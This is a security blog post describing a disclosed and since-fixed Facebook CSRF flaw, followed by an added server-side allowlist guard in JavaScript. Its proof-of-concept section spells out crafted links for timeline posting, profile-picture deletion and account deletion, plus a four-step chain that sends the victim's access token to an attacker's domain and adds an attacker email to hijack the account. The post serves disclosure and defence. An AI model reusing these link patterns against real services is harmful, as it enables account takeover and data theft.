Internet Security Blog - Hackology

[PoC] Hack Facebook Account with 1 Link

There are over 2.32 billion monthly active users on Facebook, and it gets scary when someone can hack your account just by sharing a constructed link. A recent Facebook hack could do exactly that: one click by the victim and the hacker could gain access to the complete Facebook user account.

How Facebook Hack was Discovered

A critical cross-site request forgery (CSRF) vulnerability was discovered in Facebook that allowed an attacker to take control of another Facebook account by fooling the victim into clicking a link. Fooling the victim into clicking the link is known as social engineering; when all you need is a single click, it is the easiest of things to do.

The vulnerability was discovered by a security researcher named “Samm0uda” in a flawed endpoint on Facebook which could have been exploited to bypass CSRF protection and gain control of the user’s account. The user’s password was never required in this Facebook hack.

The attacker must, however, trick the victim into clicking a special link for the attack to succeed. An attacker could have gained full access to a Facebook account, posted anything on the victim’s timeline, changed or deleted their profile picture, and even tricked users into deleting their entire Facebook accounts.

Proof of Concept

The exploit combines a vulnerable Facebook endpoint with a target endpoint and its parameters: the vulnerable endpoint makes a POST request to that target and adds the fb_dtsg parameter, which gives access to the victim’s account. As the endpoint resides on the Facebook.com domain, it is easier to trick the victim into clicking the link.

The vulnerable endpoint

https://www.facebook.com/comet/dialog_DONOTUSE/?url=XXXX

where XXXX is the endpoint, with its parameters, to which the POST request is made (the CSRF token fb_dtsg is added automatically to the request body). The same attack vector can be further modified to perform a number of other actions on the victim’s Facebook profile, which are explained below.

Making a post on the timeline

When the victim clicks on the link, a post defined by the hacker is made on the victim’s Facebook wall.

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/api/graphql/%3fdoc_id=1740513229408093%26variables={"input":{"actor_id":{TARGET_ID},"client_mutation_id":"1","source":"WWW","audience":{"web_privacyx":"REDECATED"},"message":{"text":"TEXT","ranges":[]}}}

Deleting Profile Picture

This is self-explanatory: this link, once executed, simply deletes the profile picture set by the victim on Facebook.

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/profile/picture/remove_picture/%3fdelete_from_album=1%26profile_id={TARGET_ID}

Deleting Account

The hacker can also delete the complete Facebook profile by using this URL; the “locale” parameter could have been used to change the language.

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/help/delete_account/dialog/%3f__asyncDialog=0%26locale=fr_FR

A password confirmation will be required; if the victim enters his password, then his account will be deleted.

Gaining full access of Facebook account

Full access to a Facebook account could have been obtained by adding an email address or phone to the victim’s account. It requires two separate links to be sent to the victim, one to add email or phone and one to confirm it to redirect the user after a successful request. You might think that 2 links seem like a lot, but keep in mind that both links have www.facebook.com as their domain, so the chances of success are really high; this time they are not punycode domains but the actual domain.

However, Samm0uda managed to create a single link by using endpoints that have a “next” parameter. He shared four steps to create a unique link for hacking into a Facebook account.

Step 1

Authorizing an app on behalf of the victim to obtain a Facebook access token

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/ajax/appcenter/redirect_to_app%3fapp_id={ATTACKER_APP}%26ref=appcenter_top_grossing%26redirect_uri=https%3a//www.facebook.com/v3.2/dialog/oauth%3fresponse_type%3dtoken%26client_id%3d{ATTACKER_APP}%26redirect_uri%3d{DOUBLE_URL_ENCODED_LINK}%26scope%3d&preview=0&fbs=125&sentence_id&gift_game=0&scopes[0]=email&gdpv4_source=dialog

This step uses the endpoint /v3.2/dialog/oauth to bypass the Facebook redirect protection in the “next” parameter, which blocks redirection attempts to external websites even if they are made using Link Shim.

It also serves to identify each victim using the token received, which will help later to extract the confirmation code for that specific user.

Step 2

The attacker’s website receives the user’s access token, creates an email address for that user under that domain, and redirects the user to:

https://www.facebook.com/comet/dialog_DONOTUSE/?url=/add_contactpoint/dialog/submit/%3fcontactpoint={EMAIL_CHOSEN}%26next=/v3.2/dialog/oauth%253fresponse_type%253dtoken%2526client_id%253d{ATTACKER_APP}%2526redirect_uri%253d{DOUBLE_URL_ENCODED_LINK}

It links an email to the user account using the endpoint /add_contactpoint/dialog/submit/ (no password confirmation is required).

After the linking, it redirects to the endpoint selected in the “next” parameter:

"/v3.2/dialog/oauth?response_type=token&client_id={ATTACKER_APP}&redirect_uri={ATTACKER_DOMAIN}"

which will redirect to the “ATTACKER_DOMAIN” again with the user’s access_token.

Step 3

The attacker’s website receives the “access_token”, extracts the user ID, searches for the email received for that user, gets the confirmation link, and then redirects again to:

https://www.facebook.com/confirmcontact.php?c={CODE}&z=0&gfid={HASH}

(CODE and HASH are in the email received from Facebook)

This method is simpler for the attacker, but after the linking the endpoint redirects the victim to https://www.facebook.com/settings?section=email, which exposes the newly added email, so the confirmation could instead be done using the /confirm_code/dialog/submit/ endpoint, which has a “next” parameter that could redirect the victim to the home page after the confirmation is made.

Step 4

The email is now added to the victim’s account; the attacker could reset the password and take over the account. The attack seems long, but it’s done in the blink of an eye, and it’s dangerous because it doesn’t target a specific user but anyone who visits the link in step 1.
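
One way a server could guard a forwarding parameter such as the "url" parameter of the vulnerable endpoint and the "next" parameter used in the steps above, shown as an added example that is not code from the original post or from Facebook. It decodes the value until stable, accepts only same-site paths on an allowlist of read-only pages, and checks nested forwarding parameters the same way; ORIGIN, SAFE_TARGETS, NESTED_KEYS and the sample paths are assumptions made for illustration.

```javascript
// Added example: allowlist guard for an internal forwarding parameter.
// ORIGIN, SAFE_TARGETS and NESTED_KEYS are hypothetical, not Facebook's values.
const ORIGIN = "https://www.example.test";                  // placeholder site origin
const SAFE_TARGETS = new Set(["/home/", "/help/article/"]); // read-only pages only
const NESTED_KEYS = ["next", "redirect_uri", "url"];        // parameters that forward again

// Decode until stable so %253f -> %3f -> ? cannot hide a nested target.
function fullyDecode(value, maxRounds = 5) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let decoded;
    try { decoded = decodeURIComponent(current); } catch { return null; }
    if (decoded === current) return current;
    current = decoded;
  }
  return null; // still changing after maxRounds: refuse
}

// Returns { ok, reason }. The caller forwards the request (and attaches the
// CSRF token) only when ok is true.
function checkForwardTarget(raw, depth = 0) {
  if (depth > 3) return { ok: false, reason: "nesting too deep" };
  const decoded = fullyDecode(raw);
  if (decoded === null) return { ok: false, reason: "undecodable" };
  if (!decoded.startsWith("/") || decoded.startsWith("//") || decoded.includes("\\"))
    return { ok: false, reason: "not a site-relative path" };
  let target;
  try { target = new URL(decoded, ORIGIN); }
  catch { return { ok: false, reason: "unparsable" }; }
  // The URL parser strips tabs/newlines and resolves "..", so re-check the result.
  if (target.origin !== ORIGIN) return { ok: false, reason: "cross-origin" };
  if (!SAFE_TARGETS.has(target.pathname))
    return { ok: false, reason: "path not allowlisted: " + target.pathname };
  for (const key of NESTED_KEYS) {
    for (const nested of target.searchParams.getAll(key)) {
      const inner = checkForwardTarget(nested, depth + 1);
      if (!inner.ok) return { ok: false, reason: key + " -> " + inner.reason };
    }
  }
  return { ok: true, reason: "allowlisted" };
}
```

The guard fails closed: state-changing paths are rejected because they are absent from the allowlist, not because they match a blocklist.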

Conclusion

Two-factor authentication can prevent full account takeover because it requires verification of a passcode sent to the user’s mobile, but some actions, such as posting something on the timeline, deleting and changing the profile picture, or deleting the Facebook account, cannot be prevented.

Facebook fixed the vulnerability on 31st January 2019 and paid out $25,000 to the researcher for reporting this bug, which is still not the highest bounty paid by Facebook but a great find indeed.
